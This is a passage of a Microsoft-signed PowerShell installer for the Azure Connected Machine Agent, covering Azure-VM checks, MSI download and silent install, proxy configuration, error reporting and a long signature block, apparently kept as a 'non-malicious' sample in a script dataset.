[System.EnvironmentVariableTarget]::Machine) if ('true' -eq $override) { Write-Warning '''Running on an Azure Virtual Machine with MSFT_ARC_TEST set. Azure Connected Machine Agent is designed for use outside Azure. This virtual machine should only be used for testing purposes. See https://aka.ms/azcmagent-testwarning for more details. ''' } else { Invoke-Failure -ErrorCode "AZCM0147" -Message '''Cannot install Azure Connected Machine agent on an Azure Virtual Machine. Azure Connected Machine Agent is designed for use outside Azure. To connect an Azure VM for TESTING PURPOSES ONLY, see https://aka.ms/azcmagent-testwarning for more details. ''' } } CheckRSOPLogonRights # Download the package $msiFile = Join-Path "$env:Temp" "AzureConnectedMachineAgent.msi" if ($AltDownload) { $downloadUri = $AltDownload } else { $downloadUri = "https://aka.ms/AzureConnectedMachineAgent" } Download-With-Retries -downloadUri $downloadUri # Install the package $logFile = Join-Path -Path "$env:Temp" -ChildPath "installationlog.txt" $argList = @("/i", "$msiFile" , "/l*v", "$logFile", "/qn", "REBOOT=ReallySuppress") Write-Verbose -Message "Installing agent package" -Verbose $exitCode = (Start-Process -FilePath msiexec.exe -ArgumentList $argList -Wait -Passthru).ExitCode if ($exitCode -ne 0) { # Treat ERROR_SUCCESS_REBOOT_INITIATED (1641) and ERROR_SUCCESS_REBOOT_REQUIRED (3010) as success if ($exitCode -eq 1641 -Or $exitCode -eq 3010) { Write-Warning -Message "Installation succeeded but a reboot is required to complete the installation." Write-Verbose -Message "Msiexec returned: $exitCode - treating it as success" -Verbose } else { $details = (Get-MsiErrorDetails $exitCode) $logInfo = ((Get-MsiLogSummary "$logFile") -join "`n") Invoke-Failure -Message "Installation failed: [$exitCode]: $($details.Message) $($details.Hint)`: See $logFile for additional details." -ErrorCode $details.ErrorCode -Details $logInfo } } # Check if we need to set proxy environment variable if ($PSBoundParameters.ContainsKey("Proxy")) { if ($Proxy) { Write-Verbose -Message "Setting proxy configuration: $Proxy" -Verbose & "$env:ProgramW6432\AzureConnectedMachineAgent\azcmagent" config set proxy.url ${Proxy} } else { Write-Verbose -Message "Clearing proxy configuration" -Verbose & "$env:ProgramW6432\AzureConnectedMachineAgent\azcmagent" config clear proxy.url } } } catch { $code = $_.Exception.Data.ErrorCode $details = $_.Exception.Data.Details if(!$code) { $code = "AZCM0150" } # default if we do not have some more specific error if ($OutFile) { [ordered]@{ status = "failed" error = [ordered]@{ message = $_.Exception.Message code = $code details = $details } } | ConvertTo-Json | Out-File $OutFile } Write-Error $_ -ErrorAction Continue if ($details) { Write-Output "Details: $details" } Send-Failure $_.Exception $code $AltHisEndpoint exit 1 } # Installation was successful if we got this far if ($OutFile) { [ordered]@{ status = "success" message = "Installation of azcmagent completed successfully" } | ConvertTo-Json | Out-File $OutFile } Write-Host "Installation of azcmagent completed successfully" exit 0 # SIG # Begin signature block # MIInzgYJKoZIhvcNAQcCoIInvzCCJ7sCAQExDzANBglghkgBZQMEAgEFADB5Bgor # BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG # KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCCnpZZfoZTQBHx3 # Kq9j5GdHa+cPS9xReZeO7sRnVEgzLaCCDYUwggYDMIID66ADAgECAhMzAAADri01 # UchTj1UdAAAAAAOuMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p # bmcgUENBIDIwMTEwHhcNMjMxMTE2MTkwODU5WhcNMjQxMTE0MTkwODU5WjB0MQsw # CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u # ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB # AQD0IPymNjfDEKg+YyE6SjDvJwKW1+pieqTjAY0CnOHZ1Nj5irGjNZPMlQ4HfxXG # yAVCZcEWE4x2sZgam872R1s0+TAelOtbqFmoW4suJHAYoTHhkznNVKpscm5fZ899 # QnReZv5WtWwbD8HAFXbPPStW2JKCqPcZ54Y6wbuWV9bKtKPImqbkMcTejTgEAj82 # 6GQc6/Th66Koka8cUIvz59e/IP04DGrh9wkq2jIFvQ8EDegw1B4KyJTIs76+hmpV # M5SwBZjRs3liOQrierkNVo11WuujB3kBf2CbPoP9MlOyyezqkMIbTRj4OHeKlamd # WaSFhwHLJRIQpfc8sLwOSIBBAgMBAAGjggGCMIIBfjAfBgNVHSUEGDAWBgorBgEE # AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQUhx/vdKmXhwc4WiWXbsf0I53h8T8w # VAYDVR0RBE0wS6RJMEcxLTArBgNVBAsTJE1pY3Jvc29mdCBJcmVsYW5kIE9wZXJh # dGlvbnMgTGltaXRlZDEWMBQGA1UEBRMNMjMwMDEyKzUwMTgzNjAfBgNVHSMEGDAW # gBRIbmTlUAXTgqoXNzcitW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8v # d3d3Lm1pY3Jvc29mdC5jb20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIw # MTEtMDctMDguY3JsMGEGCCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDov # L3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDEx # XzIwMTEtMDctMDguY3J0MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIB # AGrJYDUS7s8o0yNprGXRXuAnRcHKxSjFmW4wclcUTYsQZkhnbMwthWM6cAYb/h2W # 5GNKtlmj/y/CThe3y/o0EH2h+jwfU/9eJ0fK1ZO/2WD0xi777qU+a7l8KjMPdwjY # 0tk9bYEGEZfYPRHy1AGPQVuZlG4i5ymJDsMrcIcqV8pxzsw/yk/O4y/nlOjHz4oV # APU0br5t9tgD8E08GSDi3I6H57Ftod9w26h0MlQiOr10Xqhr5iPLS7SlQwj8HW37 # ybqsmjQpKhmWul6xiXSNGGm36GarHy4Q1egYlxhlUnk3ZKSr3QtWIo1GGL03hT57 # xzjL25fKiZQX/q+II8nuG5M0Qmjvl6Egltr4hZ3e3FQRzRHfLoNPq3ELpxbWdH8t # Nuj0j/x9Crnfwbki8n57mJKI5JVWRWTSLmbTcDDLkTZlJLg9V1BIJwXGY3i2kR9i # 5HsADL8YlW0gMWVSlKB1eiSlK6LmFi0rVH16dde+j5T/EaQtFz6qngN7d1lvO7uk # 6rtX+MLKG4LDRsQgBTi6sIYiKntMjoYFHMPvI/OMUip5ljtLitVbkFGfagSqmbxK # 7rJMhC8wiTzHanBg1Rrbff1niBbnFbbV4UDmYumjs1FIpFCazk6AADXxoKCo5TsO # zSHqr9gHgGYQC2hMyX9MGLIpowYCURx3L7kUiGbOiMwaMIIHejCCBWKgAwIBAgIK # YQ6Q0gAAAAAAAzANBgkqhkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNV # BAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv # c29mdCBDb3Jwb3JhdGlvbjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlm # aWNhdGUgQXV0aG9yaXR5IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEw # OTA5WjB+MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UE # BxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYD # VQQDEx9NaWNyb3NvZnQgQ29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG # 9w0BAQEFAAOCAg8AMIICCgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+la # UKq4BjgaBEm6f8MMHt03a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc # 6Whe0t+bU7IKLMOv2akrrnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4D # dato88tt8zpcoRb0RrrgOGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+ # lD3v++MrWhAfTVYoonpy4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nk # kDstrjNYxbc+/jLTswM9sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6 # A4aN91/w0FK/jJSHvMAhdCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmd # X4jiJV3TIUs+UsS1Vz8kA/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL # 5zmhD+kjSbwYuER8ReTBw3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zd # sGbiwZeBe+3W7UvnSSmnEyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3 # T8HhhUSJxAlMxdSlQy90lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS # 4NaIjAsCAwEAAaOCAe0wggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRI # bmTlUAXTgqoXNzcitW2oynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTAL # BgNVHQ8EBAMCAYYwDwYDVR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBD # uRQFTuHqp8cx0SOJNDBaBgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jv # c29mdC5jb20vcGtpL2NybC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFf # MDNfMjIuY3JsMF4GCCsGAQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3 # dy5taWNyb3NvZnQuY29tL3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFf # MDNfMjIuY3J0MIGfBgNVHSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEF # BQcCARYzaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1h # cnljcHMuaHRtMEAGCCsGAQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkA # YwB5AF8AcwB0AGEAdABlAG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn # 8oalmOBUeRou09h0ZyKbC5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7 # v0epo/Np22O/IjWll11lhJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0b # pdS1HXeUOeLpZMlEPXh6I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/ # KmtYSWMfCWluWpiW5IP0wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvy # CInWH8MyGOLwxS3OW560STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBp # mLJZiWhub6e3dMNABQamASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJi # hsMdYzaXht/a8/jyFqGaJ+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYb # BL7fQccOKO7eZS/sl/ahXJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbS # oqKfenoi+kiVH6v7RyOA9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sL # gOppO6/8MO0ETI7f33VtY5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtX # cVZOSEXAQsmbdlsKgEhr/Xmfwb1tbWrJUnMTDXpQzTGCGZ8wghmbAgEBMIGVMH4x # CzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRt # b25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01p # Y3Jvc29mdCBDb2RlIFNpZ25pbmcgUENBIDIwMTECEzMAAAOuLTVRyFOPVR0AAAAA # A64wDQYJYIZIAWUDBAIBBQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQw # HAYKKwYBBAGCNwIBCzEOMAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEIHy0 # eADuM+N33B750z5y2360Ffb4vxQBAsSuY8itVyVUMEIGCisGAQQBgjcCAQwxNDAy # oBSAEgBNAGkAYwByAG8AcwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5j # b20wDQYJKoZIhvcNAQEBBQAEggEAvnmLhznCm6n8kYg1SOyf8/wlcLq8N0hbVHof # gFmApvs0gu2eROInKTLlcy9amlDf/1lIuYB0RvyjBqfXgQezUDNP0v53LzMRS9OA # 7Cf1T+FSWEyvmYhLkt6xsaIdiKEZGMY5y57v2GR+K9AgZle0n/CN0NEArjVlyWUJ # D2BoXmF5OXxS19yor4MGfiMj2c5rBhvycVxBfRr/zfSCOUgcYf5VqAmgVpZb3kSc # Q6pC6G8AJOYIz6+e5dDY0HEX4LimyRtGG8Nrc+IbePK49P+SdJR5lfH9PM7ivfhw # 33MxKjalTxEH3CktkrMHQ0JlIzX/h8CD6h/jGgMqhO1rATQECaGCFykwghclBgor # BgEEAYI3AwMBMYIXFTCCFxEGCSqGSIb3DQEHAqCCFwIwghb+AgEDMQ8wDQYJYIZI # AWUDBAIBBQAwggFZBgsqhkiG9w0BCRABBKCCAUgEggFEMIIBQAIBAQYKKwYBBAGE # WQoDATAxMA0GCWCGSAFlAwQCAQUABCDrWNkwcdbSKS0Ywy8oZz8+Y5NMEle0Z+wU # gw6Y+arFkAIGZk3U4UbjGBMyMDI0MDUyMzE2NDM0NC40ODFaMASAAgH0oIHYpIHV # MIHSMQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH # UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMS0wKwYDVQQL # EyRNaWNyb3NvZnQgSXJlbGFuZCBPcGVyYXRpb25zIExpbWl0ZWQxJjAkBgNVBAsT # HVRoYWxlcyBUU1MgRVNOOjJBRDQtNEI5Mi1GQTAxMSUwIwYDVQQDExxNaWNyb3Nv # ZnQgVGltZS1TdGFtcCBTZXJ2aWNloIIReDCCBycwggUPoAMCAQICEzMAAAHenkie # lp8oRD0AAQAAAd4wDQYJKoZIhvcNAQELBQAwfDELMAkGA1UEBhMCVVMxEzARBgNV # BAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv # c29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAg # UENBIDIwMTAwHhcNMjMxMDEyMTkwNzEyWhcNMjUwMTEwMTkwNzEyWjCB0jELMAkG # A1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQx # HjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEtMCsGA1UECxMkTWljcm9z # b2Z0IElyZWxhbmQgT3BlcmF0aW9ucyBMaW1pdGVkMSYwJAYDVQQLEx1UaGFsZXMg # VFNTIEVTTjoyQUQ0LTRCOTItRkEwMTElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUt # U3RhbXAgU2VydmljZTCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBALSB # 9ByF9UIDhA6xFrOniw/xsDl8sSi9rOCOXSSO4VMQjnNGAo5VHx0iijMEMH9LY2SU # IBkVQS0Ml6kR+TagkUPbaEpwjhQ1mprhRgJT/jlSnic42VDAo0en4JI6xnXoAoWo # KySY8/ROIKdpphgI7OJb4XHk1P3sX2pNZ32LDY1ktchK1/hWyPlblaXAHRu0E3yn # vwrS8/bcorANO6DjuysyS9zUmr+w3H3AEvSgs2ReuLj2pkBcfW1UPCFudLd7IPZ2 # RC4odQcEPnY12jypYPnS6yZAs0pLpq0KRFUyB1x6x6OU73sudiHON16mE0l6LLT9 # OmGo0S94Bxg3N/3aE6fUbnVoemVc7FkFLum8KkZcbQ7cOHSAWGJxdCvo5OtUtRdS # qf85FklCXIIkg4sm7nM9TktUVfO0kp6kx7mysgD0Qrxx6/5oaqnwOTWLNzK+BCi1 # G7nUD1pteuXvQp8fE1KpTjnG/1OJeehwKNNPjGt98V0BmogZTe3SxBkOeOQyLA++ # 5Hyg/L68pe+DrZoZPXJaGU/iBiFmL+ul/Oi3d83zLAHlHQmH/VGNBfRwP+ixvqhy # k/EebwuXVJY+rTyfbRfuh9n0AaMhhNxxg6tGKyZS4EAEiDxrF9mAZEy8e8rf6dlK # IX5d3aQLo9fDda1ZTOw+XAcAvj2/N3DLVGZlHnHlAgMBAAGjggFJMIIBRTAdBgNV # HQ4EFgQUazAmbxseaapgdxzK8Os+naPQEsgwHwYDVR0jBBgwFoAUn6cVXQBeYl2D # 9OXSZacbUzUZ6XIwXwYDVR0fBFgwVjBUoFKgUIZOaHR0cDovL3d3dy5taWNyb3Nv # ZnQuY29tL3BraW9wcy9jcmwvTWljcm9zb2Z0JTIwVGltZS1TdGFtcCUyMFBDQSUy # MDIwMTAoMSkuY3JsMGwGCCsGAQUFBwEBBGAwXjBcBggrBgEFBQcwAoZQaHR0cDov # L3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9jZXJ0cy9NaWNyb3NvZnQlMjBUaW1l # LVN0YW1wJTIwUENBJTIwMjAxMCgxKS5jcnQwDAYDVR0TAQH/BAIwADAWBgNVHSUB # Af8EDDAKBggrBgEFBQcDCDAOBgNVHQ8BAf8EBAMCB4AwDQYJKoZIhvcNAQELBQAD # ggIBAOKUwHsXDacGOvUIgs5HDgPs0LZ1qyHS6C6wfKlLaD36tZfbWt1x+GMiazSu # y+GsxiVHzkhMW+FqK8gruLQWN/sOCX+fGUgT9LT21cRIpcZj4/ZFIvwtkBcsCz1X # EUsXYOSJUPitY7E8bbldmmhYZ29p+XQpIcsG/q+YjkqBW9mw0ru1MfxMTQs9MTDi # D28gAVGrPA3NykiSChvdqS7VX+/LcEz9Ubzto/w28WA8HOCHqBTbDRHmiP7MIj+S # QmI9VIayYsIGRjvelmNa0OvbU9CJSz/NfMEgf2NHMZUYW8KqWEjIjPfHIKxWlNMY # huWfWRSHZCKyIANA0aJL4soHQtzzZ2MnNfjYY851wHYjGgwUj/hlLRgQO5S30Zx7 # 8GqBKfylp25aOWJ/qPhC+DXM2gXajIXbl+jpGcVANwtFFujCJRdZbeH1R+Q41Fjg # Bg4m3OTFDGot5DSuVkQgjku7pOVPtldE46QlDg/2WhPpTQxXH64sP1GfkAwUtt6r # rZM/PCwRG6girYmnTRLLsicBhoYLh+EEFjVviXAGTk6pnu8jx/4WPWu0jsz7yFzg # 82/FMqCk9wK3LvyLAyDHN+FxbHAxtgwad7oLQPM0WGERdB1umPCIiYsSf/j79EqH # doNwQYROVm+ZX10RX3n6bRmAnskeNhi0wnVaeVogLMdGD+nqMIIHcTCCBVmgAwIB # AgITMwAAABXF52ueAptJmQAAAAAAFTANBgkqhkiG9w0BAQsFADCBiDELMAkGA1UE # BhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAc # BgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEyMDAGA1UEAxMpTWljcm9zb2Z0 # IFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5IDIwMTAwHhcNMjEwOTMwMTgyMjI1 # WhcNMzAwOTMwMTgzMjI1WjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGlu # Z3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBv # cmF0aW9uMSYwJAYDVQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDCC # AiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAOThpkzntHIhC3miy9ckeb0O # 1YLT/e6cBwfSqWxOdcjKNVf2AX9sSuDivbk+F2Az/1xPx2b3lVNxWuJ+Slr+uDZn # hUYjDLWNE893MsAQGOhgfWpSg0S3po5GawcU88V29YZQ3MFEyHFcUTE3oAo4bo3t # 1w/YJlN8OWECesSq/XJprx2rrPY2vjUmZNqYO7oaezOtgFt+jBAcnVL+tuhiJdxq # D89d9P6OU8/W7IVWTe/dvI2k45GPsjksUZzpcGkNyjYtcI4xyDUoveO0hyTD4MmP # frVUj9z6BVWYbWg7mka97aSueik3rMvrg0XnRm7KMtXAhjBcTyziYrLNueKNiOSW # rAFKu75xqRdbZ2De+JKRHh09/SDPc31BmkZ1zcRfNN0Sidb9pSB9fvzZnkXftnIv # 231fgLrbqn427DZM9ituqBJR6L8FA6PRc6ZNN3SUHDSCD/AQ8rdHGO2n6Jl8P0zb # r17C89XYcz1DTsEzOUyOArxCaC4Q6oRRRuLRvWoYWmEBc8pnol7XKHYC4jMYcten # IPDC+hIK12NvDMk2ZItboKaDIV1fMHSRlJTYuVD5C4lh8zYGNRiER9vcG9H9stQc # xWv2XFJRXRLbJbqvUAV6bMURHXLvjflSxIUXk8A8FdsaN8cIFRg/eKtFtvUeh17a # j54WcmnGrnu3tz5q4i6tAgMBAAGjggHdMIIB2TASBgkrBgEEAYI3FQEEBQIDAQAB # MCMGCSsGAQQBgjcVAgQWBBQqp1L+ZMSavoKRPEY1Kc8Q/y8E7jAdBgNVHQ4EFgQU # n6cVXQBeYl2D9OXSZacbUzUZ6XIwXAYDVR0gBFUwUzBRBgwrBgEEAYI3TIN9AQEw # QTA/BggrBgEFBQcCARYzaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9E # b2NzL1JlcG9zaXRvcnkuaHRtMBMGA1UdJQQMMAoGCCsGAQUFBwMIMBkGCSsGAQQB # gjcUAgQMHgoAUwB1AGIAQwBBMAsGA1UdDwQEAwIBhjAPBgNVHRMBAf8EBTADAQH/ # MB8GA1UdIwQYMBaAFNX2VsuP6KJcYmjRPZSQW9fOmhjEMFYGA1UdHwRPME0wS6BJ # oEeGRWh0dHA6Ly9jcmwubWljcm9zb2Z0LmNvbS9wa2kvY3JsL3Byb2R1Y3RzL01p # Y1Jvb0NlckF1dF8yMDEwLTA2LTIzLmNybDBaBggrBgEFBQcBAQROMEwwSgYIKwYB # BQUHMAKGPmh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2kvY2VydHMvTWljUm9v # Q2VyQXV0XzIwMTAtMDYtMjMuY3J0MA0GCSqGSIb3DQEBCwUAA4ICAQCdVX38Kq3h # LB9nATEkW+Geckv8qW/qXBS2Pk5HZHixBpOXPTEztTnXwnE2P9pkbHzQdTltuw8x # 5MKP+2zRoZQYIu7pZmc6U03dmLq2HnjYNi6cqYJWAAOwBb6J6Gngugnue99qb74p # y27YP0h1AdkY3m2CDPVtI1TkeFN1JFe53Z/zjj3G82jfZfakVqr3lbYoVSfQJL1A # oL8ZthISEV09J+BAljis9/kpicO8F7BUhUKz/AyeixmJ5/ALaoHCgRlCGVJ1ijbC # HcNhcy4sa3tuPywJeBTpkbKpW99Jo3QMvOyRgNI95ko+ZjtPu4b6MhrZlvSP9pEB # 9s7GdP32THJvEKt1MMU0sHrYUP4KWN1APMdUbZ1jdEgssU5HLcEUBHG/ZPkkvnNt # yo4JvbMBV0lUZNlz138eW0QBjloZkWsNn6Qo3GcZKCS6OEuabvshVGtqRRFHqfG3 # rsjoiV5PndLQTHa1V1QJsWkBRH58oWFsc/4Ku+xBZj1p/cvBQUl+fpO+y/g75LcV # v7TOPqUxUYS8vwLBgqJ7Fx0ViY1w/ue10CgaiQuPNtq6TPmb/wrpNPgkNWcr4A24 # 5oyZ1uEi6vAnQj0llOZ0dFtq0Z4+7X6gMTN9vMvpe784cETRkPHIqzqKOghif9lw # Y1NNje6CbaUFEMFxBmoQtB1VM1izoXBm8qGCAtQwggI9AgEBMIIBAKGB2KSB1TCB # 0jELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1Jl # ZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEtMCsGA1UECxMk # TWljcm9zb2Z0IElyZWxhbmQgT3BlcmF0aW9ucyBMaW1pdGVkMSYwJAYDVQQLEx1U # aGFsZXMgVFNTIEVTTjoyQUQ0LTRCOTItRkEwMTElMCMGA1UEAxMcTWljcm9zb2Z0 # IFRpbWUtU3RhbXAgU2VydmljZaIjCgEBMAcGBSsOAwIaAxUAaKBSisy4y86pl8Xy # 22CJZExE2vOggYMwgYCkfjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGlu # Z3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBv # cmF0aW9uMSYwJAYDVQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDAN # BgkqhkiG9w0BAQUFAAIFAOn5pL4wIhgPMjAyNDA1MjMxOTE5MjZaGA8yMDI0MDUy # NDE5MTkyNlowdDA6BgorBgEEAYRZCgQBMSwwKjAKAgUA6fmkvgIBADAHAgEAAgIF # oDAHAgEAAgIRWzAKAgUA6fr2PgIBADA2BgorBgEEAYRZCgQCMSgwJjAMBgorBgEE # AYRZCgMCoAowCAIBAAIDB6EgoQowCAIBAAIDAYagMA0GCSqGSIb3DQEBBQUAA4GB # AHAHOnFkAOIhZG98e5ulTnYMj006y8ddnDfW+fxkC14Sa+fCfTbL1RK6WwLMN/ip # Rc49JVDIeM+FWw7+T+uJCQr/Dgl1eeYCJ/XR6QXkaomMFwlVbn7c03vhMD8xpAKj # 7KVGOEkJRooQQNHTA9FuZ0pIVmx47Yqg7t8iS03jAc/NMYIEDTCCBAkCAQEwgZMw # fDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1Jl # ZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMd # TWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIwMTACEzMAAAHenkielp8oRD0AAQAA # Ad4wDQYJYIZIAWUDBAIBBQCgggFKMBoGCSqGSIb3DQEJAzENBgsqhkiG9w0BCRAB # BDAvBgkqhkiG9w0BCQQxIgQg6tJAwu6tmeJxh+C4GDQvJAFyXgWvkbEg/2pJayDc # NnIwgfoGCyqGSIb3DQEJEAIvMYHqMIHnMIHkMIG9BCCOPiOfDcFeEBBJAn/mC3Mg # rT5w/U2z81LYD44Hc34dezCBmDCBgKR+MHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQI # EwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3Nv # ZnQgQ29ycG9yYXRpb24xJjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBD # QSAyMDEwAhMzAAAB3p5InpafKEQ9AAEAAAHeMCIEIJOrmzej/kgpdUIWtxN84/vV # 9/w3N0VowYvY46GfvX0iMA0GCSqGSIb3DQEBCwUABIICADPtHhll0cJUkhRl9qWo # HOgXICS2K29Kj6dYY0Fx4JXOQbF7QSVGsjI7UAAzn+7s3C/h4y08jxRbGwpoDwtd # RD3qqTiHXSgC3sQ4rLag+PNOeBaIqQxru3AQMzz0/Xnpa5rkTVX5yC2aOhuo4lRQ # aMc6cvlXzgTuEt9TKmWMpeUfB0wOW95OFdpsQ3KdhuxWKF16kiSAV3IQvQYuI49T # fIBb38mNeWHTMMs6uioMfhgL/+Gseuv7fcOCduO7r4s1WdGNQegBdB38d4OcmUoj # YAotb6aiEUNnHcqAnEZtWopJ7qwKOIuEeIYQfQKWx7+cPvscdIYGI9Rp7Qe+YhYe # aCWR/jgWH542FI6Fr8ODA9C14uOTfifx47iWAnnil5MzvtN//dqWzdFXRQC3uKdv # PzvtV/fpE5xol7erlYMNL6ZdnQovZyVnBGdnW1iVacVc6j6i3JPdKvnbrrZvUIGC # H18lhTFr99NWESgK07h8jKKhD2TBEV8DMH0plpOJOjHOUjzz22KEykm/ikOHHNis # rm8EdLLoebPxcW1SN5lmvf6XAHTCnwe8WhnKLpnO8F8h6TdFWAHst/V2RfhIlEct # fB0h2d9H8kwpSVDJc4WApTUoV+J0mjUwNWxAiNohE+1ERJykM8GoeM4FSJjVgKxJ # JAqpqQ1l0ATEmCoQ00+21Dq3 # SIG # End signature block
combined_dataset/train/non-malicious/1924.ps1
1924.ps1
